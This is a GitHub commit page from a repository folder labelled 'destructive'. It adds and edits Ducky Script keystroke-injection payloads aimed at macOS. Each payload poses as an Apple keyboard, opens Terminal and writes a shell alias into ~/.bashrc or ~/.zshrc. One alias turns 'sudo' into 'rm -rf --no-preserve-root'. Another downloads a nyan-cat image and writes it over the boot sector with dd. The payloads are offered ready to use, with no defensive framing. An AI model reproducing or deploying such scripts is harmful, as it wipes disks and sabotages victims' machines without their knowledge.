Skip to content

Commit

Permalink
updates
Browse files Browse the repository at this point in the history
  • Loading branch information
FalsePhilosopher committed Jan 6, 2023
1 parent dc38976 commit 16e60a9
Show file tree
Hide file tree
Showing 5 changed files with 70 additions and 9 deletions.
2 changes: 1 addition & 1 deletion destructive/Unix-like/Osx/Bombs/zipbomb/quack.txt
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
REM FalsePhilosopher
REM Target osx untested
ID 05ac:021e Apple:Keyboard
DELAY 300
DELAY 500
COMMAND SPACE
DELAY 300
STRING terminal.app
Expand Down
11 changes: 8 additions & 3 deletions destructive/Unix-like/Osx/OSX_no_more_hardrive.txt
Original file line number Diff line number Diff line change
@@ -1,9 +1,14 @@
REM Changes sudo to 'sudo rm -rf / --no-preserve-root'
REM Target OSx 10.15+
ID 05ac:021e Apple:Keyboard
DELAY 1000
CTRL-ALT t
DELAY 500
STRING nano ~/.bashrc
COMMAND SPACE
DELAY 500
STRING terminal.app
DELAY 300
ENTER
DELAY 1000
STRING nano ~/.zshrc
DELAY 500
CTRL w
DELAY 150
Expand Down
25 changes: 25 additions & 0 deletions destructive/Unix-like/Osx/OSX_no_more_hardrive_oldOSx.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
REM Changes sudo to 'sudo rm -rf / --no-preserve-root'
REM Target OSx 10.14 and below
ID 05ac:021e Apple:Keyboard
DELAY 500
COMMAND SPACE
DELAY 500
STRING terminal.app
DELAY 300
ENTER
DELAY 1000
STRING nano ~/.bashrc
DELAY 500
CTRL w
DELAY 150
STRING alias ls=
ENTER
DELAY 150
END
ENTER
SPACE
REPEAT 3
STRING alias sudo='sudo rm -rf --no-preserve-root'
CTRL o
DELAY 150
ENTER
14 changes: 9 additions & 5 deletions destructive/Unix-like/Osx/OSX_no_more_hardriven_nyan.txt
Original file line number Diff line number Diff line change
@@ -1,12 +1,16 @@
REM Author FalsePhilosopher
REM Target Unix-like
REM Target OSx 10.15+
REM Props SkeletonMan for the idea
REM Changes writes a nyan cat to the hard drive so the computer boots to a nyan cat
REM Changes the sudo alias to write a nyan cat to the hard drive so the computer boots to a nyan cat
ID 05ac:021e Apple:Keyboard
DELAY 1000
CTRL-ALT t
DELAY 500
STRING nano ~/.bashrc
COMMAND SPACE
DELAY 500
STRING terminal.app
DELAY 300
ENTER
DELAY 1000
STRING nano ~/.zshrc
DELAY 500
CTRL w
DELAY 150
Expand Down
27 changes: 27 additions & 0 deletions destructive/Unix-like/Osx/OSX_no_more_hardriven_nyan_oldOSx.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,27 @@
REM Author FalsePhilosopher
REM Target OSx 10.14 and below
REM Props SkeletonMan for the idea
REM Changes the sudo alias to write a nyan cat to the hard drive so the computer boots to a nyan cat
ID 05ac:021e Apple:Keyboard
DELAY 500
COMMAND SPACE
DELAY 500
STRING terminal.app
DELAY 300
ENTER
DELAY 1000
STRING nano ~/.bashrc
DELAY 500
CTRL w
DELAY 150
STRING alias ls=
ENTER
DELAY 150
END
ENTER
SPACE
REPEAT 3
STRING alias sudo='sudo wget https://github.com/brainsmoke/nyanmbr/blob/master/nyan.img && dd if=nyan.img of=/dev/sda bs=512 count=1'
CTRL o
DELAY 150
ENTER

0 comments on commit 16e60a9

Please sign in to comment.